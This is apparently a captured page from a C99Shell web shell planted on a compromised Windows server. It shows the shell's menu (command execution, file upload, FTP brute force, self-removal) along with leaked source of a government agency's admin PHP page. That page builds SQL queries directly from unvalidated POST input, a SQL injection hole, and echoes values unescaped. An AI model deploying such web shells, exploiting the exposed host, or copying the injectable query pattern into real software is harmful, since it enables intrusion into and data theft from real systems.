!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA\boletinlegal\admin\actos\   drwxrwxrwx
Free 1.21 GB of 239.26 GB (0.5%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mostrar.php (7.21 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * UserEdit.php
 *
 * This page is for users to edit their account information
 * such as their password, email address, etc. Their
 * usernames can not be edited. When changing their
 * password, they must first confirm their current password.
 *
 * Written by: Jpmaster77 a.k.a. The Grandmaster of C++ (GMC)
 * Last Updated: August 26, 2004
 */
include("../usuarios/include/session.php");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="noI firefox" xmlns="http://www.w3.org/1999/xhtml"><head>
<link rel="shortcut icon" href="../../images/favicon.ico">
<title>Modulo Administraci&oacute;n</title>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<link href="../index_files/style.css" rel="stylesheet" type="text/css">
<link rel="StyleSheet" href="../../tabla_files/orangebrownie.css" type="text/css">
<script language="JavaScript">

function enviar(){
document.forms.norma.submit();
}

</script>
</head>
<!-- CSS -->
<link rel="stylesheet" href="../css/dynamic.css" type="text/css">
<link rel="stylesheet" href="../css/creation.css" type="text/css">
</head><body id="creation">
    <?php
/**
 * User has submitted form without errors and user's
 * account has been edited successfully.
 */
if(isset($_SESSION['useredit'])){
   unset(
$_SESSION['useredit']);
   
   echo 
"<h1>User Account Edit Success!</h1>";
   echo 
"<p><b>$session->username</b>, tu cuenta ha sido actualizada satisfactoriamente. "
       
."<a href=\"../index.php\">Inicio</a>.</p>";
}
else{
?>
<?php
/**
 * If user is not logged in, then do not display anything.
 * If user is logged in, then display the form to edit
 * account information, with the current email address
 * already in the field.
 */
if($session->logged_in){
?>

<div id="container" class="clearfix">
<div> <img src="../../images/cabezote BLEGAL.jpg" width="960" height="150" border="0"></div>


  

  <TABLE width="764" border=0 style="BORDER-LEFT-COLOR: green; BORDER-BOTTOM-COLOR: green; BORDER-TOP-COLOR: green; BORDER-RIGHT-COLOR: green" align="center">
              
                              <TR>
                                 <TD>
                                 
                                 <div id='boundary'>
  
    <div id='content'>
      <div id='itsthetable'>
      <FORM name=f1 action="mostrar.php" method="post">
       <SELECT name="ano"  style="font-family: Tahoma; color: #006600; font-size: 8pt; font-weight: bold; border: 1px solid #006600; background-color: #E2E2E2;">
      <option value=''>Seleccione el a&ntilde;o ...</option>
      <?php
      
include("../../conex.php");
          
$sql 'SELECT distinct YEAR(fecha) ano FROM resoluciones order by fecha'
            
$res=mysql_query($sql,$conexion);
            while ( 
$myrow=mysql_fetch_array($res)){
                 
$ano=$myrow["ano"];
                 
printf ("<option value='%s'>%s</option>",$ano$ano);
                 }
        
?>         
      
       </SELECT>
       
       <select id="tipo" name="tipo" onChange="f1.submit();" style="font-family: Tahoma; color: #006600; font-size: 8pt; font-weight: bold; border: 1px solid #006600; background-color: #E2E2E2;">
       <option value="">Seleccione el tipo</option>
       <option value="AUTO">AUTO</option>
       <option value="RESOLUCION">RESOLUCION</option>
       </select>
       
       <input type="button" name="limpiar2" value="Volver al menu principal" onClick="location.href='../admin.php'">
             </FORM> 
                                    <?php 
             
             
     
if ($_POST['tipo'] == 'AUTO')
    {
        
$tabla 'AUTOS';
    }
    else{
        
$tabla 'RESOLUCIONES';
    }         
                               
          

                 
?> 
                    
               
        
    </div>

      

    
</div>

</div>

                                 </TD>
                                 
                                </TR>
                                
                            </TBODY></TABLE>   <table width='100%'>
            
            <thead>
                <tr>
                    <th width='91' scope='col'>id</th>
                    <th width='139' scope='col'>No</th>
                    <th width='85' scope='col'>Fecha </th>
                    <th width='129' scope='col'>Titulo</th>
                    <th width='186' scope='col'>Usuario</th>
                    <th width='100' scope='col'>Seleccionar</th>
                    
                </tr>
            </thead>
                                 <?php include("../../conex.php");
    
$sql "select no, fecha, resuelve, expediente, usuario, sector, subsector, abogado, direccion, id, tipo from $tabla where YEAR(fecha)= '$_POST[ano]'  order by id asc"

//echo "$sql";    
    //id='$id'";
    
$cursor mysql_query$sql$conexion );
    
$num_rows mysql_num_rows($cursor);
    
$change=0;

while( 
$row mysql_fetch_array$cursor ) ){
    
$no $row["no"];
    
$fecha $row["fecha"];
    
$resuelve $row["resuelve"];
    
$sector $row["sector"];
    
$subsector $row["subsector"];
    
$usuario $row["usuario"];
    
$expediente $row["expediente"];
    
$abogado $row["abogado"];
    
$direccion $row["direccion"];
    
$id $row["id"];
    
$tipo $row["tipo"];
    
$con $con+1;              
    
$year1=date("Y"strtotime($fecha));
    if (
$no <> '0') {
        
$nos $nos 1;
        }
    
    
    
?>                               
            
            <form name="<?php echo "form$con"?>" method="post" action="../actos/modificar.php">
                     <tbody>             
            
                                
                                <tr  <?php if ($change == 1) {echo "class='odd'";} ?>>
                    <td><input name='id' type='text' onFocus='setFocus(this.id);' onBlur='setFocus(' value='<?php echo "$id"?>' size="4"');'></td>
                    <td><input type='text' name='no' value='<?php echo "$no"?>' onFocus='setFocus(this.id);' onBlur='setFocus('');'>
                    <input type="hidden" name='tipo' value='<?php echo "$tipo"?>' onFocus='setFocus(this.id);' onBlur='setFocus('');'></td>
                    <td><?php echo "$fecha"?></td>
                    <td><?php echo "$resuelve"?></td>
                    <td><?php echo "$usuario";?>
                      <input name="ver" type="button" id="ver" value="+" onclick="pepe=window.open('detalle.php?id=<?php echo "$id"?> ','pepe')"/></td>
                    <td><INPUT id=creTercero:_id468 onBlur="setFocus('');" onfocus=setFocus(this.id); onClick="window.opener.document.getElementById('no').value = window.document.<?php echo "form$con"?>.no.value; 
 window.opener.document.getElementById('id').value = window.document.<?php echo "form$con"?>.id.value;
 window.opener.document.getElementById('tipo').value = window.document.<?php echo "form$con"?>.tipo.value;                    window.opener.focus(); self.close(); return false;" type=button value=Aceptar name=creTercero:_id468>
                                </INPUT>
                                </INPUT></td>
                </tr>
           </form>
<?php 
if ($change == 0){
$change=1;
}
else if (
$change == 1){
$change=0;
}

}

?>           
<tfoot>
                <tr>
                    <td>Total Solicitudes :</td>
                    <td><?php echo "$num_rows"?></td>
                       <td >Total  :</td>
                    <td ><?php echo "$nos"?></td>
                    <td >Indicador de Eficiencia:</td>
                    <td ><?php echo $nos/$num_rows*100?></td>
                </tr>
            </tfoot>        
        </table>                                           </TD>
              </TR></TBODY>
  </TABLE>
</FORM>    
<?php
}
}

?>
<div class="footer">
<i class="c1">·</i> 
Copyright © 2011 
<i class="c1">·</i><strong>Secretaria de Ambiente </strong><b>.</b> 
<i class="c1">·</i>Todos los derechos reservados <i class="c1">·</i></div>

</div><!--container-->


</body></html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--